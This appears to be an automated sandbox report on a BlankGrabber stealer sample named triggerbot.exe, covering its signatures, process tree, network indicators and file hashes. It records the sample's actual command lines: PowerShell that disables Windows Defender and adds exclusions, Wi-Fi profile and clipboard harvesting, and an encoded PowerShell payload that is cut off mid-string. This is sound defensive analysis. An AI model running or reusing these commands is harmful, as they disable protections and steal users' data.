Malware Analysis Report

2024-10-16 07:12

Sample ID 240530-v7crwsgd74
Target triggerbot.exe
SHA256 562011f4373d048ed2b60deb22b126686aee96ceac8255196d599b5f9f378416
Tags
upx execution spyware stealer blankgrabber
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

562011f4373d048ed2b60deb22b126686aee96ceac8255196d599b5f9f378416

Threat Level: Known bad

The file triggerbot.exe was found to be: Known bad.

Malicious Activity Summary

upx execution spyware stealer blankgrabber

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Reads user/profile data of web browsers

ACProtect 1.3x - 1.4x DLL software

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Enumerates physical storage devices

Gathers system information

Suspicious use of AdjustPrivilegeToken

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-30 17:37

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 17:37

Reported

2024-05-30 17:40

Platform

win7-20240508-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

Signatures

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\triggerbot.exe

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

C:\Users\Admin\AppData\Local\Temp\triggerbot.exe

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI18322\python311.dll

MD5 711da56eb35a88095f2baad0e821aa24
SHA1 2755f0d62c54642e936b63974fecc48a971e02e8
SHA256 d8c4c37f8826d9f906686a6b89ba3e37ee766be2893b0a7a9f49fd74f3e6f7a6
SHA512 556151238325dcd7b6d24864b39414cb0d4c2b18e98ac2446a2939bf0312d5b58128f6601e739c300bf3a38c4ddb84078a7b2e800d4e59875c21e23468e38a01

memory/2664-23-0x00000000749F0000-0x0000000074F00000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 17:37

Reported

2024-05-30 17:40

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI49642\rar.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4964 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Users\Admin\AppData\Local\Temp\triggerbot.exe
PID 4964 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Users\Admin\AppData\Local\Temp\triggerbot.exe
PID 4964 wrote to memory of 4164 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Users\Admin\AppData\Local\Temp\triggerbot.exe
PID 4164 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 1116 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1116 wrote to memory of 4092 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 4700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 4700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1772 wrote to memory of 4700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 696 wrote to memory of 2696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4164 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 720 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 1296 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1296 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1296 wrote to memory of 2352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 4164 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 1972 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1972 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1972 wrote to memory of 2988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1604 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tree.com
PID 1604 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tree.com
PID 1604 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tree.com
PID 4164 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 4164 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\triggerbot.exe C:\Windows\SysWOW64\cmd.exe
PID 2964 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2964 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2964 wrote to memory of 1352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 380 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 380 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 380 wrote to memory of 2760 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe
PID 720 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\Conhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\triggerbot.exe

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

C:\Users\Admin\AppData\Local\Temp\triggerbot.exe

"C:\Users\Admin\AppData\Local\Temp\triggerbot.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\triggerbot.exe'"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‏‌ .scr'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\triggerbot.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‏‌ .scr'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\tasklist.exe

tasklist /FO LIST

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\SysWOW64\tree.com

tree /A /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEM